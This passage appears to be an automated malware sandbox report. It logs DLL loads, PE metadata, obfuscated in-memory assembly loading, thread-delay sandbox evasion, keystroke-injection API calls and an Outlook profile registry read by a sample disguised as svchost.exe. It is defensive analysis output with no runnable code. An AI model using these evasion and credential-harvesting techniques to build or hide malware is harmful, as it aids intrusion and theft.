                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 8JVG9KELay.exeStatic file information: File size 1085952 > 1048576
                Source: 8JVG9KELay.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 8JVG9KELay.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 8JVG9KELay.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 8JVG9KELay.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 8JVG9KELay.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 8JVG9KELay.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 8JVG9KELay.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: _.pdb source: svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: 8JVG9KELay.exe, 00000000.00000003.1314641117.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, 8JVG9KELay.exe, 00000000.00000003.1318110678.00000000036B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 8JVG9KELay.exe, 00000000.00000003.1314641117.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, 8JVG9KELay.exe, 00000000.00000003.1318110678.00000000036B0000.00000004.00001000.00020000.00000000.sdmp
                Source: 8JVG9KELay.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 8JVG9KELay.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 8JVG9KELay.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 8JVG9KELay.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 8JVG9KELay.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                barindex
                Source: 1.3.svchost.exe.346d000.0.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
                Source: 1.2.svchost.exe.5970000.3.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0085C304 LoadLibraryA,GetProcAddress,0_2_0085C304
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007EC590 push eax; retn 007Eh0_2_007EC599
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00808B85 push ecx; ret 0_2_00808B98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041C40C push cs; iretd 1_2_0041C4E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00423149 push eax; ret 1_2_00423179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041C50E push cs; iretd 1_2_0041C4E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004231C8 push eax; ret 1_2_00423179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041C6BE push ebx; ret 1_2_0041C6BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_053FE558 push eax; iretd 1_2_053FE559
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_087A3438 pushad ; iretd 1_2_087A3569
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007E4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007E4A35
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008655FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_008655FD
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_008033C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008033C7
                Source: C:\Users\user\Desktop\8JVG9KELay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\8JVG9KELay.exeAPI/Special instruction interceptor: Address: 7D3204
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5310000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5310000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599750Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599627Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599500Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599387Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599276Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599168Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599057Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598813Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598688Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598201Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597963Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597844Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596498Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596032Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595907Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595782Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594500Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594391Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594280Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594157Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1585Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 8248Jump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeAPI coverage: 5.1 %
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8524Thread sleep count: 1585 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -599874s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8524Thread sleep count: 8248 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -599750s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -599627s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -599500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -599387s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -599276s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -599168s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -599057s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -598938s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -598813s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -598688s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -598344s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -598201s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -598078s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -597963s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -597844s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -597735s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -597610s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -597485s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -597360s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -597235s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -597110s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596985s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596860s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596735s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596610s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596498s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596375s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596266s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596141s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -596032s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -595907s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -595782s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -595672s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -595563s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -595438s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -595313s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -595188s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -595063s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -594844s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -594719s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -594609s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -594500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -594391s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -594280s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8520Thread sleep time: -594157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00844696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00844696
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0084C9C7
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084C93C FindFirstFileW,FindClose,0_2_0084C93C
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084F200
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084F35D
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084F65E
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00843A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00843A2B
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_00843D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00843D4E
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_0084BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084BF27
                Source: C:\Users\user\Desktop\8JVG9KELay.exeCode function: 0_2_007E4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007E4AFE
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
